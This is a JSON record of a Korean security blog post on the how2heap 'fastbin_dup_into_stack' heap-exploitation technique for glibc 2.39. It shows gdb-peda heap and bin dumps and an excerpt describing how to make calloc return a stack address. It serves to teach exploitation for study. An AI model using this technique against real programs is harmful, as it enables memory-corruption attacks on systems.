    gdb-peda$ parseheap\naddr                prev                size                 status              fd                bk \n0x555555559000      0x0                 0x290                Used                None              None\n0x555555559290      0x0                 0x20                 Freed        0x555555559              None\n0x5555555592b0      0x0                 0x20                 Freed     0x55500000c7f9              None\n0x5555555592d0      0x0                 0x20                 Freed     0x55500000c799              None\n0x5555555592f0      0x0                 0x20                 Freed     0x55500000c7b9              None\n0x555555559310      0x0                 0x20                 Freed     0x55500000c659              None\n0x555555559330      0x0                 0x20                 Freed     0x55500000c679              None\n0x555555559350      0x0                 0x20                 Freed     0x55500000c619              None\n0x555555559370      0x0                 0x20                 Used                None              None\n0x555555559390      0x0                 0x20                 Used                None              None\n0x5555555593b0      0x0                 0x20                 Used                None              None\ngdb-peda$ heapinfo\n(0x20)     fastbin[0]: 0x7fe5ffffe (invaild memory)\n(0x30)     fastbin[1]: 0x0\n(0x40)     fastbin[2]: 0x0\n(0x50)     fastbin[3]: 0x0\n(0x60)     fastbin[4]: 0x0\n(0x70)     fastbin[5]: 0x0\n(0x80)     fastbin[6]: 0x0\n(0x90)     fastbin[7]: 0x0\n(0xa0)     fastbin[8]: 0x0\n(0xb0)     fastbin[9]: 0x0\n                  top: 0x5555555593d0 (size : 0x20c30)\n       last_remainder: 0x0 (size : 0x0)\n            unsortbin: 0x0\n(0x20)   tcache_entry[0](7): 0x555555559360 --> 0x555555559340 --> 0x555555559320 --> 0x555555559300 --> 0x5555555592e0 --> 0x5555555592c0 --> 0x5555555592a0<\/pre>\n","protected":false},"excerpt":{"rendered":"
    \ud658\uacbd Ubuntu GLIBC 2.39-0ubuntu8.4 \/ Ubuntu 24.04.1 LTS x86_64 \uc694\uc57d fastbin_dup \uae30\ubc95\uc744 \uc751\uc6a9\ud558\uc5ec \ud799 \ud560\ub2f9\ud560\ub54c \uc2a4\ud0dd\uc601\uc5ed\uc758 \uc8fc\uc18c\ub85c \ubc1b\uac8c \ub9cc\ub4e4 \uc218 \uc788\uc74c. \ub0b4\uc6a9 fastbin_dup \uae30\ubc95\uc744 \ud655\uc7a5\ud55c \uac83\uc73c\ub85c,calloc\uc744 \uc18d\uc5ec \uc81c\uc5b4 \uac00\ub2a5\ud55c \uc704\uce58(\uc774 \uacbd\uc6b0\uc5d0\ub294 \uc2a4\ud0dd)\ub85c \ud3ec\uc778\ud130\ub97c \ubc18\ud658\ud558\ub3c4\ub85d \ub9cc\ub4ed\ub2c8\ub2e4. 1. tcache\ub97c \ucc44\uc6b0\uae30 \uc704\ud574 7\ubc88 malloc\ud558\uace0, 7\ubc88 free\ub97c \ud574\uc900\ub2e4. \uadf8\ub798\uc57c \uc774\ud6c4\ubd80\ud130 fastbin\uc73c\ub85c \ud560\ub2f9 \uac00\ub2a5. \ucf54\ub4dc: \uacb0\uacfc: 2. 8\ud06c\uae30\ub9cc\ud07c 3\ubc88 \ud560\ub2f9\ud568.\uac01\uac01… \ub354 \ubcf4\uae30 »[how2heap\/glibc2.39] fastbin_dup_into_stack<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","footnotes":""},"categories":[52],"tags":[53,35,51,25],"class_list":["post-3569","post","type-post","status-publish","format-standard","hentry","category-how2heap","tag-fastbin","tag-heap","tag-how2heap","tag-pwnable"],"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3569","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3569"}],"version-history":[{"count":2,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3569\/revisions"}],"predecessor-version":[{"id":3579,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3569\/revisions\/3579"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3569"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3569"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3569"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}